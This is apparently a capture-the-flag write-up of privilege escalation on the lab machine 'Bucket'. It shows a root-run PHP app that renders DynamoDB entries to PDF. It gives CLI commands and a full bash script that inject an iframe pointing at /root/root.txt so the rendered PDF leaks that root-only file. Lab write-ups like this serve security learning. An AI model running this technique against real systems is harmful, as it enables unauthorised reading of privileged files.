6 privesc

As service running on port 8000 is assigned user:root
<VirtualHost 127.0.0.1:8000>
        <IfModule mpm_itk_module>
                AssignUserId root root
        </IfModule>
        DocumentRoot /var/www/bucket-app
</VirtualHost>

http://localhost:8000/
Site under construction or maintenance

roy@bucket:~$ ls -la /var/www/bucket-app/
total 856
drwxr-x---+  4 root root   4096 Feb 10  2021 .
drwxr-xr-x   4 root root   4096 Feb 10  2021 ..
-rw-r-x---+  1 root root     63 Sep 23  2020 composer.json
-rw-r-x---+  1 root root  20533 Sep 23  2020 composer.lock
drwxr-x---+  2 root root   4096 Feb 10  2021 files
-rwxr-x---+  1 root root  17222 Sep 23  2020 index.php
-rwxr-x---+  1 root root 808729 Jun 10  2020 pd4ml_demo.jar
drwxr-x---+ 10 root root   4096 Feb 10  2021 vendor

roy@bucket:/var/www/bucket-app$ cat index.php
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}
else
{
?>

# if request is POST, action="get_alerts"
# it connects to dynamoDB, scans table: alerts and filters by title: Ransomware
# for each entry, it creates a random.html and add the contents to the file

Exploit Process:

  1. Create table alerts

  2. Add entry in table with iframe that reads /root/root.txt

  3. POST request to :8000 with action=get_alerts

  4. check for result.pdf in /var/www/bucket-app/files/

# creating table in dynamodb
var params = {
    "TableName": "kashz",
    "KeySchema": [
      { "AttributeName": "title", "KeyType": "HASH" },
      { "AttributeName": "data", "KeyType": "RANGE" }
    ],
    "AttributeDefinitions": [
      { "AttributeName": "title", "AttributeType": "S" },
      { "AttributeName": "data", "AttributeType": "S" }
    ],
    "ProvisionedThroughput": {
      "ReadCapacityUnits": 10,
      "WriteCapacityUnits": 5
    }
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response

});

# using cli 
$ cat create-table.json
{
    "TableName": "kashz",
    "KeySchema": [
      { "AttributeName": "title", "KeyType": "HASH" },
      { "AttributeName": "data", "KeyType": "RANGE" }
    ],
    "AttributeDefinitions": [
      { "AttributeName": "title", "AttributeType": "S" },
      { "AttributeName": "data", "AttributeType": "S" }
    ],
    "ProvisionedThroughput": {
      "ReadCapacityUnits": 10,
      "WriteCapacityUnits": 5
    }
}
$ aws dynamodb --endpoint-url http://s3.bucket.htb create-table --cli-input-json file://create-table.json

# adding using put-item
var params = {
    TableName: 'kashz',
    Item: {
        "title": "ransomware",
        "data": "/root/root.txt",
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});
# using cli
$ aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name kashz --item '{"title":{"S":"item3"},"data":{"S":"/root/root.txt"}}'

# now to send request to :8000 with action=get_alerts
curl -X POST http://127.0.0.1:8000 --data "action=get_alerts"

Automated Exploit File

# using script
#!/bin/bash

echo "Creating 'alerts' table:"
cat << EOF > create-table.json
{
    "TableName": "alerts",
    "KeySchema": [
      { "AttributeName": "title", "KeyType": "HASH" },
      { "AttributeName": "data", "KeyType": "RANGE" }
    ],
    "AttributeDefinitions": [
      { "AttributeName": "title", "AttributeType": "S" },
      { "AttributeName": "data", "AttributeType": "S" }
    ],
    "ProvisionedThroughput": {
      "ReadCapacityUnits": 15,
      "WriteCapacityUnits": 10
    }
}
EOF
aws dynamodb --endpoint-url http://s3.bucket.htb create-table --cli-input-json file://create-table.json

sleep 2
echo "Adding record:"
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><iframe src=\"/root/root.txt\"></iframe><html>"}}'

sleep 2
echo "Listing records:"
aws dynamodb scan --table-name alerts --endpoint-url http://s3.bucket.htb

echo "Sending POST request:"
curl -X POST http://127.0.0.1:8000 --data "action=get_alerts"

echo "Done!"

Now we can read the .pdf file and it contains the flag.

Last updated